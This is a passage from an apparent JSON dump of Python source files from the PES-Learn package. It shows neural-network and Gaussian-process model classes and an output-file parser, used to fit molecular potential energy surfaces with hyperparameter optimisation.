tol=1.0, decay=False, verbose=False)\n test.append(testerror)\n validation.append(valid)\n # save best architectures for hyperparameter optimization\n indices = np.argsort(test)\n best_hlayers = [self.nas_layers[i] for i in indices[:3]]\n return best_hlayers\n\n def split_train_test(self, params, validation_size=None, precision=32):\n \"\"\"\n Take raw dataset and apply hyperparameters/input keywords/preprocessing\n and train/test (tr,test) splitting.\n Assigns:\n self.X : complete input data, transformed\n self.y : complete output data, transformed\n self.Xscaler : scaling transformer for inputs \n self.yscaler : scaling transformer for outputs \n self.Xtr : training input data, transformed\n self.ytr : training output data, transformed\n self.Xtest : test input data, transformed\n self.ytest : test output data, transformed\n self.Xvalid : validation input data, transformed\n self.yvalid : validation output data, transformed\n \"\"\"\n self.X, self.y, self.Xscaler, self.yscaler = self.preprocess(params, self.raw_X, self.raw_y)\n if self.sampler == 'user_supplied':\n self.Xtr = self.transform_new_X(self.raw_Xtr, params, self.Xscaler)\n self.ytr = self.transform_new_y(self.raw_ytr, self.yscaler)\n self.Xtest = self.transform_new_X(self.raw_Xtest, params, self.Xscaler)\n self.ytest = self.transform_new_y(self.raw_ytest, self.yscaler)\n if self.valid_path:\n self.Xvalid = self.transform_new_X(self.raw_Xvalid, params, self.Xscaler)\n self.yvalid = self.transform_new_y(self.raw_yvalid, self.yscaler)\n else:\n raise Exception(\"Please provide a validation set for Neural Network training.\")\n else:\n self.Xtr = self.X[self.train_indices]\n self.ytr = self.y[self.train_indices]\n #TODO: this is splitting validation data in the same way at every model build, not necessary.\n self.valid_indices, self.new_test_indices = train_test_split(self.test_indices, train_size = validation_size, random_state=42)\n if validation_size:\n self.Xvalid = self.X[self.valid_indices] \n self.yvalid = self.y[self.valid_indices]\n self.Xtest = self.X[self.new_test_indices]\n self.ytest = self.y[self.new_test_indices]\n\n #self.Xtmp = self.X[self.test_indices]\n #self.ytmp = self.y[self.test_indices]\n #if validation_size:\n # self.Xvalid, self.Xtest, self.yvalid, self.ytest = train_test_split(self.Xtmp,\n # self.ytmp, \n # train_size = validation_size, \n # random_state=42)\n\n ## temporary implementation: structure based validation set sample\n #if validation_size:\n # data = np.hstack((self.Xtmp, self.ytmp))\n # col = [str(i) for i in range(data.shape[1])]\n # col[-1] = 'E'\n # df = pd.DataFrame(data, columns=col)\n # df.columns.values[-1] = 'E'\n # sample = DataSampler(df, validation_size)\n # sample.structure_based()\n # validation_indices, test_indices = sample.get_indices()\n # self.Xvalid = self.Xtmp[validation_indices]\n # self.yvalid = self.ytmp[validation_indices]\n # self.Xtest = self.Xtmp[test_indices]\n # self.ytest = self.ytmp[test_indices]\n else:\n raise Exception(\"Please specify a validation set size for Neural Network training.\")\n\n # convert to Torch Tensors\n if precision == 32:\n self.Xtr = torch.tensor(self.Xtr, dtype=torch.float32)\n self.ytr = torch.tensor(self.ytr, dtype=torch.float32)\n self.Xtest = torch.tensor(self.Xtest, dtype=torch.float32)\n self.ytest = torch.tensor(self.ytest, dtype=torch.float32)\n self.Xvalid = torch.tensor(self.Xvalid,dtype=torch.float32)\n self.yvalid = torch.tensor(self.yvalid,dtype=torch.float32)\n self.X = torch.tensor(self.X,dtype=torch.float32)\n self.y = torch.tensor(self.y,dtype=torch.float32)\n elif precision == 64:\n self.Xtr = torch.tensor(self.Xtr, dtype=torch.float64)\n self.ytr = torch.tensor(self.ytr, dtype=torch.float64)\n self.Xtest = torch.tensor(self.Xtest, dtype=torch.float64)\n self.ytest = torch.tensor(self.ytest, dtype=torch.float64)\n self.Xvalid = torch.tensor(self.Xvalid,dtype=torch.float64)\n self.yvalid = torch.tensor(self.yvalid,dtype=torch.float64)\n self.X = torch.tensor(self.X,dtype=torch.float64)\n self.y = torch.tensor(self.y,dtype=torch.float64)\n else:\n raise Exception(\"Invalid option for 'precision'\")\n\n def get_optimizer(self, opt_type, mdata, lr=0.1): \n rate = lr\n if opt_type == 'lbfgs':\n #optimizer = torch.optim.LBFGS(mdata, lr=rate, max_iter=20, max_eval=None, tolerance_grad=1e-5, tolerance_change=1e-9, history_size=100) # Defaults\n #optimizer = torch.optim.LBFGS(mdata, lr=rate, max_iter=100, max_eval=None, tolerance_grad=1e-10, tolerance_change=1e-14, history_size=200)\n optimizer = torch.optim.LBFGS(mdata, lr=rate, max_iter=20, max_eval=None, tolerance_grad=1e-8, tolerance_change=1e-12, history_size=100)\n if opt_type == 'adam':\n optimizer = torch.optim.Adam(mdata, lr=rate)\n return optimizer\n\n def build_model(self, params, maxit=1000, val_freq=10, es_patience=2, opt='lbfgs', tol=1.0, decay=False, verbose=False, precision=32, return_model=False):\n \"\"\"\n Parameters\n ----------\n params : dict\n Hyperparameter dictionary\n maxit : int\n Maximum number of epochs\n val_freq : int\n Validation frequency: Compute error on validation set every 'val_freq' epochs \n es_patience : int\n Early stopping patience. How many validations to do before giving up training this model according to tolerance 'tol'\n tol : float\n Tolerance for early stopping in wavenumbers cm^-1: if validation set error \n does not improve by this quantity after waiting for 'es_patience' validation cycles, halt training\n decay : bool\n If True, reduce the learning rate if validation error plateaus\n verbose : bool\n If true, print training progress after every validation \n \"\"\"\n print(\"Hyperparameters: \", params)\n self.split_train_test(params, validation_size=self.nvalid, precision=precision) # split data, according to scaling hp's\n scale = params['scale_y'] # Find descaling factor to convert loss to original energy units\n if scale == 'std':\n loss_descaler = self.yscaler.var_[0]\n if scale.startswith('mm'):\n loss_descaler = (1/self.yscaler.scale_[0]**2)\n\n activation = params['scale_X']['activation']\n if activation == 'tanh':\n activ = nn.Tanh() \n if activation == 'sigmoid':\n activ = nn.Sigmoid()\n \n inp_dim = self.inp_dim\n l = params['layers']\n torch.manual_seed(0)\n depth = len(l)\n structure = OrderedDict([('input', nn.Linear(inp_dim, l[0])),\n ('activ_in' , activ)])\n model = nn.Sequential(structure)\n for i in range(depth-1):\n model.add_module('layer' + str(i), nn.Linear(l[i], l[i+1]))\n model.add_module('activ' + str(i), activ)\n model.add_module('output', nn.Linear(l[depth-1], 1))\n if precision == 64: # cast model to proper precision\n model = model.double() \n\n metric = torch.nn.MSELoss()\n # Define optimizer\n if 'lr' in params:\n lr = params['lr']\n elif opt == 'lbfgs':\n lr = 0.5\n else:\n lr = 0.1\n optimizer = self.get_optimizer(opt, model.parameters(), lr=lr)\n # Define update variables for early stopping, decay, gradient explosion handling\n prev_loss = 1.0\n es_tracker = 0\n best_val_error = None\n failures = 0\n decay_attempts = 0\n prev_best = None\n decay_start = False\n \n for epoch in range(1,maxit):\n def closure():\n optimizer.zero_grad()\n y_pred = model(self.Xtr)\n loss = torch.sqrt(metric(y_pred, self.ytr)) # passing RMSE instead of MSE improves precision IMMENSELY\n loss.backward()\n return loss\n optimizer.step(closure)\n # validate\n if epoch % val_freq == 0:\n with torch.no_grad():\n tmp_pred = model(self.Xvalid) \n tmp_loss = metric(tmp_pred, self.yvalid)\n val_error_rmse = np.sqrt(tmp_loss.item() * loss_descaler) * hartree2cm # loss_descaler converts MSE in scaled data domain to MSE in unscaled data domain\n if best_val_error:\n if val_error_rmse < best_val_error:\n prev_best = best_val_error * 1.0\n best_val_error = val_error_rmse * 1.0 \n else:\n record = True\n best_val_error = val_error_rmse * 1.0 \n prev_best = best_val_error\n if verbose:\n print(\"Epoch {} Validation RMSE (cm-1): {:5.3f}\".format(epoch, val_error_rmse))\n if decay_start:\n scheduler.step(val_error_rmse)\n\n # Early Stopping \n if epoch > 5:\n # if current validation error is not the best (current - best > 0) and is within tol of previous error, the model is stagnant. \n if ((val_error_rmse - prev_loss) < tol) and (val_error_rmse - best_val_error) > 0.0: \n es_tracker += 1\n # else if: current validation error is not the best (current - best > 0) and is greater than the best by tol, the model is overfitting. Bad epoch.\n elif ((val_error_rmse - best_val_error) > tol) and (val_error_rmse - best_val_error) > 0.0: \n es_tracker += 1\n # else if: if the current validation error is a new record, but not significant, the model is stagnant\n elif (prev_best - best_val_error) < 0.001:\n es_tracker += 1\n # else: model set a new record validation error. Reset early stopping tracker\n else:\n es_tracker = 0\n #TODO this framework does not detect oscillatory behavior about 'tol', though this has not been observed to occur in any case \n # Check status of early stopping tracker. First try decaying to see if stagnation can be resolved, if not then terminate training\n if es_tracker > es_patience:\n if decay: # if decay is set to true, if early stopping criteria is triggered, begin LR scheduler and go back to previous model state and attempt LR decay.\n if decay_attempts < 1:\n decay_attempts += 1\n es_tracker = 0\n if verbose:\n print(\"Performance plateau detected. Reverting model state and decaying learning rate.\")\n decay_start = True\n thresh = (0.1 / np.sqrt(loss_descaler)) / hartree2cm # threshold is 0.1 wavenumbers\n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=0.9, threshold=thresh, threshold_mode='abs', min_lr=0.05, cooldown=2, patience=10, verbose=verbose)\n model.load_state_dict(saved_model_state_dict)\n saved_optimizer_state_dict['param_groups'][0]['lr'] = lr*0.9\n optimizer.load_state_dict(saved_optimizer_state_dict)\n # Since learning rate is decayed, override tolerance, patience, validation frequency for high-precision\n #tol = 0.05\n #es_patience = 100\n #val_freq = 1\n continue\n else:\n prev_loss = val_error_rmse * 1.0\n if verbose:\n print('Early stopping termination')\n break\n else:\n prev_loss = val_error_rmse * 1.0\n if verbose:\n print('Early stopping termination')\n break\n\n # Handle exploding gradients \n if epoch > 10:\n if (val_error_rmse > prev_loss*10): # detect large increases in loss\n if epoch > 60: # distinguish between exploding gradients at near converged models and early on exploding grads\n if verbose:\n print(\"Exploding gradient detected. Resuming previous model state and decaying learning rate\")\n model.load_state_dict(saved_model_state_dict)\n saved_optimizer_state_dict['param_groups'][0]['lr'] = lr*0.5\n optimizer.load_state_dict(saved_optimizer_state_dict)\n failures += 1 # if \n if failures > 2: \n break\n else:\n continue\n else:\n break\n if val_error_rmse != val_error_rmse: # detect NaN \n break\n if ((prev_loss < 1.0) and (precision == 32)): # if 32 bit precision and model is giving very high accuracy, kill so the accuracy does not go beyond 32 bit precision\n break\n prev_loss = val_error_rmse * 1.0 # save previous loss to track improvement\n\n # Periodically save model state so we can reset under instability/overfitting/performance plateau\n if epoch % 50 == 0:\n saved_model_state_dict = copy.deepcopy(model.state_dict())\n saved_optimizer_state_dict = copy.deepcopy(optimizer.state_dict())\n \n with torch.no_grad():\n test_pred = model(self.Xtest)\n test_loss = metric(test_pred, self.ytest)\n test_error_rmse = np.sqrt(test_loss.item() * loss_descaler) * hartree2cm \n val_pred = model(self.Xvalid) \n val_loss = metric(val_pred, self.yvalid)\n val_error_rmse = np.sqrt(val_loss.item() * loss_descaler) * hartree2cm\n full_pred = model(self.X)\n full_loss = metric(full_pred, self.y)\n full_error_rmse = np.sqrt(full_loss.item() * loss_descaler) * hartree2cm\n print(\"Test set RMSE (cm-1): {:5.2f} Validation set RMSE (cm-1): {:5.2f} Full dataset RMSE (cm-1): {:5.2f}\".format(test_error_rmse, val_error_rmse, full_error_rmse))\n if return_model:\n return model, test_error_rmse, val_error_rmse, full_error_rmse \n else:\n return test_error_rmse, val_error_rmse\n\n def hyperopt_model(self, params):\n \"\"\"\n A Hyperopt-friendly wrapper for build_model\n \"\"\"\n # skip building this model if hyperparameter combination already attempted\n for i in self.hyperopt_trials.results:\n if 'memo' in i:\n if params == i['memo']:\n return {'loss': i['loss'], 'status': STATUS_OK, 'memo': 'repeat'}\n if self.itercount > self.hp_maxit:\n return {'loss': 0.0, 'status': STATUS_FAIL, 'memo': 'max iters reached'}\n error_test, error_valid = self.build_model(params)\n self.itercount += 1\n if np.isnan(error_valid):\n return {'loss': 1e5, 'status': STATUS_FAIL, 'memo': 'nan'}\n else:\n return {'loss': error_valid, 'status': STATUS_OK, 'memo': params}\n\n def preprocess(self, params, raw_X, raw_y):\n \"\"\"\n Preprocess raw data according to hyperparameters\n \"\"\"\n if params['morse_transform']['morse']:\n raw_X = morse(raw_X, params['morse_transform']['morse_alpha'])\n if params['pip']['pip']:\n # find path to fundamental invariants form molecule type AxByCz...\n path = os.path.join(package_directory, \"lib\", self.molecule_type, \"output\")\n raw_X, degrees = interatomics_to_fundinvar(raw_X,path)\n if params['pip']['degree_reduction']:\n raw_X = degree_reduce(raw_X, degrees)\n if params['scale_X']:\n X, Xscaler = general_scaler(params['scale_X']['scale_X'], raw_X)\n else:\n X = raw_X\n Xscaler = None\n if params['scale_y']:\n y, yscaler = general_scaler(params['scale_y'], raw_y)\n else:\n y = raw_y\n yscaler = None\n return X, y, Xscaler, yscaler\n\n def save_model(self, params, model, performance):\n print(\"Saving ML model data...\") \n model_path = \"model1_data\"\n while os.path.isdir(model_path):\n new = int(re.findall(\"\\d+\", model_path)[0]) + 1\n model_path = re.sub(\"\\d+\",str(new), model_path)\n os.mkdir(model_path)\n os.chdir(model_path)\n torch.save(model, 'model.pt')\n \n with open('hyperparameters', 'w') as f:\n print(params, file=f)\n\n test, valid, full = performance\n with open('performance', 'w') as f:\n print(\"Test set RMSE (cm-1): {:5.2f} Validation set RMSE (cm-1): {:5.2f} Full dataset RMSE (cm-1): {:5.2f}\".format(test, valid, full), file=f)\n \n if self.sampler == 'user_supplied':\n self.traindata.to_csv('train_set',sep=',',index=False,float_format='%12.12f')\n self.validdata.to_csv('validation_set',sep=',',index=False,float_format='%12.12f')\n self.testdata.to_csv('test_set', sep=',', index=False, float_format='%12.12f')\n else:\n self.dataset.iloc[self.train_indices].to_csv('train_set',sep=',',index=False,float_format='%12.12f')\n self.dataset.iloc[self.valid_indices].to_csv('validation_set', sep=',', index=False, float_format='%12.12f')\n self.dataset.iloc[self.new_test_indices].to_csv('test_set', sep=',', index=False, float_format='%12.12f')\n \n self.dataset.to_csv('PES.dat', sep=',',index=False,float_format='%12.12f')\n with open('compute_energy.py', 'w+') as f:\n print(self.write_convenience_function(), file=f)\n os.chdir(\"../\")\n\n def transform_new_X(self, newX, params, Xscaler=None):\n \"\"\"\n Transform a new, raw input according to the model's transformation procedure \n so that prediction can be made.\n \"\"\"\n # ensure X dimension is n x m (n new points, m input variables)\n if len(newX.shape) == 1:\n newX = np.expand_dims(newX,0)\n elif len(newX.shape) > 2:\n raise Exception(\"Dimensions of input data is incorrect.\")\n if params['morse_transform']['morse']:\n newX = morse(newX, params['morse_transform']['morse_alpha'])\n if params['pip']['pip']:\n # find path to fundamental invariants for an N atom system with molecule type AxByCz...\n path = os.path.join(package_directory, \"lib\", self.molecule_type, \"output\")\n newX, degrees = interatomics_to_fundinvar(newX,path)\n if params['pip']['degree_reduction']:\n newX = degree_reduce(newX, degrees)\n if Xscaler:\n newX = Xscaler.transform(newX)\n return newX\n\n def transform_new_y(self, newy, yscaler=None): \n if yscaler:\n newy = yscaler.transform(newy)\n return newy\n\n def inverse_transform_new_y(self, newy, yscaler=None): \n if yscaler:\n newy = yscaler.inverse_transform(newy)\n return newy\n\n def write_convenience_function(self):\n string = \"from peslearn.ml import NeuralNetwork\\nfrom peslearn import InputProcessor\\nimport torch\\nimport numpy as np\\nfrom itertools import combinations\\n\\n\"\n if self.pip:\n string += \"nn = NeuralNetwork('PES.dat', InputProcessor(''), molecule_type='{}')\\n\".format(self.molecule_type)\n else:\n string += \"nn = NeuralNetwork('PES.dat', InputProcessor(''))\\n\"\n with open('hyperparameters', 'r') as f:\n hyperparameters = f.read()\n string += \"params = {}\\n\".format(hyperparameters)\n string += \"X, y, Xscaler, yscaler = nn.preprocess(params, nn.raw_X, nn.raw_y)\\n\"\n string += \"model = torch.load('model.pt')\\n\"\n string += nn_convenience_function\n return string\n\n\n\n\n\n\n\n \n \n\n\n\n\n" }, { "alpha_fraction": 0.5845641493797302, "alphanum_fraction": 0.5866444706916809, "avg_line_length": 48.55670166015625, "blob_id": "bdf9d923dec9c31cb9f578c58ca77ee7ae7ad69e", "content_id": "6542e0c0f66ea04c49d68034ef9adc1c2aeffba3", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4807, "license_type": "permissive", "max_line_length": 232, "num_lines": 97, "path": "/peslearn/utils/parsing_helper.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nimport os\nimport json\nfrom collections import OrderedDict\nfrom ..datagen.outputfile import OutputFile\n\ndef parse(input_obj, mol): \n # define energy extraction routine based on user keywords\n if input_obj.keywords['energy'] == 'cclib':\n if input_obj.keywords['energy_cclib']: \n def extract_energy(input_obj, output_obj):\n energy = output_obj.extract_energy_with_cclib(input_obj.keywords['energy_cclib'])\n return energy\n #TODO add flag for when cclib fails to parse, currently just outputs a None \n else: \n raise Exception(\"\\n Please indicate which cclib energy to parse; e.g. energy_cclib = 'scfenergies', energy_cclib = 'ccenergies' \")\n \n elif input_obj.keywords['energy'] == 'regex': \n if input_obj.keywords['energy_regex']: \n def extract_energy(input_obj, output_obj):\n energy = output_obj.extract_energy_with_regex(input_obj.keywords['energy_regex'])\n return energy\n else:\n raise Exception(\"\\n energy_regex value not assigned in input. Please add a regular expression which captures the energy value, e.g. energy_regex = 'RHF Final Energy: \\s+(-\\d+\\.\\d+)'\")\n \n # define gradient extraction routine based on user keywords\n if input_obj.keywords['gradient'] == 'cclib':\n def extract_gradient(output_obj):\n gradient = output_obj.extract_cartesian_gradient_with_cclib() \n # not needed, (unless it's None when grad isnt found?)\n #gradient = np.asarray(gradient) \n return gradient\n \n elif input_obj.keywords['gradient'] == 'regex':\n header = input_obj.keywords['gradient_header'] \n footer = input_obj.keywords['gradient_footer'] \n grad_line_regex = input_obj.keywords['gradient_line'] \n if header and footer and grad_line_regex:\n def extract_gradient(output_obj, h=header, f=footer, g=grad_line_regex):\n gradient = output_obj.extract_cartesian_gradient_with_regex(h, f, g)\n #gradient = np.asarray(gradient)\n return gradient\n else:\n raise Exception(\"For regular expression gradient extraction, gradient_header, gradient_footer, and gradient_line string identifiers are required to isolate the cartesian gradient block. See documentation for details\") \n\n # parse original internals or interatomics?\n if input_obj.keywords['pes_format'] == 'zmat':\n data = pd.DataFrame(index=None, columns = mol.unique_geom_parameters)\n geom_path = \"/geom\"\n elif input_obj.keywords['pes_format'] == 'interatomics':\n data = pd.DataFrame(index=None, columns = mol.interatomic_labels)\n geom_path = \"/interatomics\"\n else:\n raise Exception(\"pes_format keyword value invalid. Must be 'zmat' or 'interatomics'\")\n\n if input_obj.keywords['energy']: \n data['E'] = ''\n if input_obj.keywords['gradient']: \n ngrad = 3*(mol.n_atoms - mol.n_dummy) \n grad_cols = [\"g%d\" % (i) for i in range(ngrad)]\n for i in grad_cols:\n data[i] = ''\n\n # parse output files \n os.chdir(\"./\" + input_obj.keywords['pes_dir_name'])\n dirs = [i for i in os.listdir(\".\") if os.path.isdir(i) ]\n dirs = sorted(dirs, key=lambda x: int(x))\n for d in dirs: \n #path = d + \"/\" + \"output.dat\" \n path = d + \"/\" + input_obj.keywords['output_name']\n output_obj = OutputFile(path)\n if input_obj.keywords['energy']:\n E = extract_energy(input_obj, output_obj)\n if input_obj.keywords['gradient']:\n G = extract_gradient(output_obj)\n ngrad = 3*(mol.n_atoms - mol.n_dummy) \n grad_cols = [\"g%d\" % (i) for i in range(ngrad)]\n with open(d + geom_path) as f:\n for line in f:\n tmp = json.loads(line, object_pairs_hook=OrderedDict)\n df = pd.DataFrame(data=tmp, index=None, columns=tmp[0].keys())\n df['E'] = E\n if input_obj.keywords['gradient']:\n df2 = pd.DataFrame(data=[G.flatten().tolist()],index=None, columns=grad_cols)\n df = pd.concat([df, df2], axis=1)\n data = data.append(df)\n if input_obj.keywords['pes_redundancy'] == 'true':\n continue\n else:\n break\n os.chdir('../')\n\n if input_obj.keywords['sort_pes'] == 'true': \n data = data.sort_values(\"E\")\n data.to_csv(input_obj.keywords['pes_name'], sep=',', index=False, float_format='%12.12f')\n print(\"Parsed data has been written to {}\".format(input_obj.keywords['pes_name']))\n" }, { "alpha_fraction": 0.6010476350784302, "alphanum_fraction": 0.6065983772277832, "avg_line_length": 48, "blob_id": "9a6dcd8b6c2f1e5a5c8e46e542c4f7ff4abf9669", "content_id": "6d443feb2bb51ebc5e88c9634f91f49f808da645", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12791, "license_type": "permissive", "max_line_length": 202, "num_lines": 261, "path": "/peslearn/ml/gaussian_process.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "import numpy as np\nimport sklearn.metrics\nimport json\nimport os\nimport re\nimport sys\nimport gc\nfrom hyperopt import fmin, tpe, hp, STATUS_OK, STATUS_FAIL, Trials, space_eval\nfrom GPy.models import GPRegression\nfrom GPy.kern import RBF\n\nfrom .model import Model\nfrom ..constants import hartree2cm, package_directory, gp_convenience_function\nfrom ..utils.printing_helper import hyperopt_complete\nfrom ..lib.path import fi_dir\nfrom .data_sampler import DataSampler \nfrom .preprocessing_helper import morse, interatomics_to_fundinvar, degree_reduce, general_scaler\n\nclass GaussianProcess(Model):\n \"\"\"\n Constructs a Gaussian Process Model using GPy\n \"\"\"\n def __init__(self, dataset_path, input_obj, molecule_type=None, molecule=None, train_path=None, test_path=None):\n super().__init__(dataset_path, input_obj, molecule_type, molecule, train_path, test_path)\n self.set_default_hyperparameters()\n \n def set_default_hyperparameters(self):\n \"\"\"\n Set default hyperparameter space. If none is provided, default is used.\n \"\"\"\n self.hyperparameter_space = {\n 'scale_X': hp.choice('scale_X', ['std', 'mm01', 'mm11', None]),\n 'scale_y': hp.choice('scale_y', ['std', 'mm01', 'mm11', None]),\n }\n\n if self.input_obj.keywords['pes_format'] == 'interatomics':\n self.set_hyperparameter('morse_transform', hp.choice('morse_transform',[{'morse': True,'morse_alpha': hp.quniform('morse_alpha', 1, 2, 0.1)},{'morse': False}]))\n else:\n self.set_hyperparameter('morse_transform', hp.choice('morse_transform',[{'morse': False}]))\n if self.pip:\n val = hp.choice('pip',[{'pip': True,'degree_reduction': hp.choice('degree_reduction', [True,False])}])\n self.set_hyperparameter('pip', val)\n else:\n self.set_hyperparameter('pip', hp.choice('pip', [{'pip': False}]))\n\n if self.input_obj.keywords['gp_ard'] == 'opt': # auto relevancy determination (independant length scales for each feature)\n self.set_hyperparameter('ARD', hp.choice('ARD', [True,False]))\n #TODO add optional space inclusions, something like: if option: self.hyperparameter_space['newoption'] = hp.choice(..)\n\n def split_train_test(self, params):\n \"\"\"\n Take raw dataset and apply hyperparameters/input keywords/preprocessing\n and train/test (tr,test) splitting.\n Assigns:\n self.X : complete input data, transformed\n self.y : complete output data, transformed\n self.Xscaler : scaling transformer for inputs \n self.yscaler : scaling transformer for outputs \n self.Xtr : training input data, transformed\n self.ytr : training output data, transformed\n self.Xtest : test input data, transformed\n self.ytest : test output data, transformed\n \"\"\"\n self.X, self.y, self.Xscaler, self.yscaler = self.preprocess(params, self.raw_X, self.raw_y)\n if self.sampler == 'user_supplied':\n self.Xtr = self.transform_new_X(self.raw_Xtr, params, self.Xscaler)\n self.ytr = self.transform_new_y(self.raw_ytr, self.yscaler)\n self.Xtest = self.transform_new_X(self.raw_Xtest, params, self.Xscaler)\n self.ytest = self.transform_new_y(self.raw_ytest, self.yscaler)\n \n else:\n self.Xtr = self.X[self.train_indices]\n self.ytr = self.y[self.train_indices]\n self.Xtest = self.X[self.test_indices]\n self.ytest = self.y[self.test_indices]\n\n def build_model(self, params, nrestarts=10, maxit=1000, seed=0):\n print(\"Hyperparameters: \", params)\n self.split_train_test(params)\n np.random.seed(seed) # make GPy deterministic for a given hyperparameter config\n dim = self.X.shape[1]\n if self.input_obj.keywords['gp_ard'] == 'opt':\n ard_val = params['ARD']\n elif self.input_obj.keywords['gp_ard'] == 'true':\n ard_val = True\n else:\n ard_val = False\n kernel = RBF(dim, ARD=ard_val) # TODO add HP control of kernel\n self.model = GPRegression(self.Xtr, self.ytr, kernel=kernel, normalizer=False)\n self.model.optimize_restarts(nrestarts, optimizer=\"lbfgsb\", robust=True, verbose=False, max_iters=maxit, messages=False)\n gc.collect(2) #fixes some memory leak issues with certain BLAS configs\n\n def hyperopt_model(self, params):\n # skip building this model if hyperparameter combination already attempted\n for i in self.hyperopt_trials.results:\n if 'memo' in i:\n if params == i['memo']:\n return {'loss': i['loss'], 'status': STATUS_OK, 'memo': 'repeat'}\n if self.itercount > self.hp_maxit:\n return {'loss': 0.0, 'status': STATUS_FAIL, 'memo': 'max iters reached'}\n self.build_model(params)\n error_test = self.vet_model(self.model)\n self.itercount += 1\n return {'loss': error_test, 'status': STATUS_OK, 'memo': params}\n\n def predict(self, model, data_in):\n prediction, v1 = model.predict(data_in, full_cov=False)\n return prediction \n\n def vet_model(self, model):\n \"\"\"Convenience method for getting model errors of test and full datasets\"\"\"\n pred_test = self.predict(model, self.Xtest)\n pred_full = self.predict(model, self.X)\n error_test = self.compute_error(self.ytest, pred_test, self.yscaler)\n error_full, median_error, max_errors = self.compute_error(self.y, pred_full, yscaler=self.yscaler, max_errors=5)\n print(\"Test Dataset {}\".format(round(hartree2cm * error_test,2)), end=' ')\n print(\"Full Dataset {}\".format(round(hartree2cm * error_full,2)), end=' ')\n print(\"Median error: {}\".format(np.round(median_error[0],2)), end=' ')\n print(\"Max 5 errors: {}\".format(np.sort(np.round(max_errors.flatten(),1))),'\\n')\n return error_test\n \n def preprocess(self, params, raw_X, raw_y):\n \"\"\"\n Preprocess raw data according to hyperparameters\n \"\"\"\n # TODO make more flexible. If keys don't exist, ignore them. smth like \"if key: if param['key']: do transform\"\n if params['morse_transform']['morse']:\n raw_X = morse(raw_X, params['morse_transform']['morse_alpha']) # Transform to morse variables (exp(-r/alpha))\n # Transform to FIs, degree reduce if called \n if params['pip']['pip']:\n # find path to fundamental invariants form molecule type AxByCz...\n #path = os.path.join(package_directory, \"lib\", self.molecule_type, \"output\")\n path = os.path.join(fi_dir, self.molecule_type, \"output\")\n raw_X, degrees = interatomics_to_fundinvar(raw_X,path)\n if params['pip']['degree_reduction']:\n raw_X = degree_reduce(raw_X, degrees)\n \n if params['scale_X']:\n X, Xscaler = general_scaler(params['scale_X'], raw_X)\n else:\n X = raw_X\n Xscaler = None\n if params['scale_y']:\n y, yscaler = general_scaler(params['scale_y'], raw_y)\n else:\n y = raw_y\n yscaler = None\n return X, y, Xscaler, yscaler\n \n def optimize_model(self):\n print(\"Beginning hyperparameter optimization...\")\n print(\"Trying {} combinations of hyperparameters\".format(self.hp_maxit))\n print(\"Training with {} points (Full dataset contains {} points).\".format(self.ntrain, self.n_datapoints))\n print(\"Using {} training set point sampling.\".format(self.sampler))\n print(\"Errors are root-mean-square error in wavenumbers (cm-1)\")\n self.hyperopt_trials = Trials()\n self.itercount = 1 # keep track of hyperopt iterations \n if self.input_obj.keywords['rseed']:\n rstate = np.random.RandomState(self.input_obj.keywords['rseed'])\n else:\n rstate = None\n best = fmin(self.hyperopt_model,\n space=self.hyperparameter_space,\n algo=tpe.suggest,\n max_evals=self.hp_maxit*2,\n rstate=rstate, \n show_progressbar=False,\n trials=self.hyperopt_trials)\n hyperopt_complete()\n print(\"Best performing hyperparameters are:\")\n final = space_eval(self.hyperparameter_space, best)\n print(str(sorted(final.items())))\n self.optimal_hyperparameters = dict(final)\n # obtain final model from best hyperparameters\n print(\"Fine-tuning final model architecture...\")\n self.build_model(self.optimal_hyperparameters, nrestarts=10, maxit=1000)\n print(\"Final model performance (cm-1):\")\n self.test_error = self.vet_model(self.model)\n self.save_model(self.optimal_hyperparameters)\n\n def save_model(self, params):\n # Save model. Currently GPy requires saving training data in model for some reason. \n model_dict = self.model.to_dict(save_data=True)\n print(\"Saving ML model data...\") \n model_path = \"model1_data\"\n while os.path.isdir(model_path):\n new = int(re.findall(\"\\d+\", model_path)[0]) + 1\n model_path = re.sub(\"\\d+\",str(new), model_path)\n os.mkdir(model_path)\n os.chdir(model_path)\n with open('model.json', 'w') as f:\n json.dump(model_dict, f)\n with open('hyperparameters', 'w') as f:\n print(params, file=f)\n \n if self.sampler == 'user_supplied':\n self.traindata.to_csv('train_set',sep=',',index=False,float_format='%12.12f')\n self.testdata.to_csv('test_set', sep=',', index=False, float_format='%12.12f')\n else:\n self.dataset.iloc[self.train_indices].to_csv('train_set',sep=',',index=False,float_format='%12.12f')\n self.dataset.iloc[self.test_indices].to_csv('test_set', sep=',', index=False, float_format='%12.12f')\n \n self.dataset.to_csv('PES.dat', sep=',',index=False,float_format='%12.12f')\n # write convenience function\n with open('compute_energy.py', 'w+') as f:\n print(self.write_convenience_function(), file=f)\n\n # print model performance\n sys.stdout = open('performance', 'w') \n self.vet_model(self.model)\n sys.stdout = sys.__stdout__\n os.chdir(\"../\")\n\n def transform_new_X(self, newX, params, Xscaler=None):\n \"\"\"\n Transform a new, raw input according to the model's transformation procedure \n so that prediction can be made.\n \"\"\"\n # ensure X dimension is n x m (n new points, m input variables)\n if len(newX.shape) == 1:\n newX = np.expand_dims(newX,0)\n elif len(newX.shape) > 2:\n raise Exception(\"Dimensions of input data is incorrect.\")\n if params['morse_transform']['morse']:\n newX = morse(newX, params['morse_transform']['morse_alpha'])\n if params['pip']['pip']:\n # find path to fundamental invariants for an N atom system with molecule type AxByCz...\n path = os.path.join(package_directory, \"lib\", self.molecule_type, \"output\")\n newX, degrees = interatomics_to_fundinvar(newX,path)\n if params['pip']['degree_reduction']:\n newX = degree_reduce(newX, degrees)\n if Xscaler:\n newX = Xscaler.transform(newX)\n return newX\n\n def transform_new_y(self, newy, yscaler=None): \n if yscaler:\n newy = yscaler.transform(newy)\n return newy\n\n def inverse_transform_new_y(self, newy, yscaler=None): \n if yscaler:\n newy = yscaler.inverse_transform(newy)\n return newy\n\n def write_convenience_function(self):\n string = \"from peslearn.ml import GaussianProcess\\nfrom peslearn import InputProcessor\\nfrom GPy.core.model import Model\\nimport numpy as np\\nimport json\\nfrom itertools import combinations\\n\\n\"\n if self.pip:\n string += \"gp = 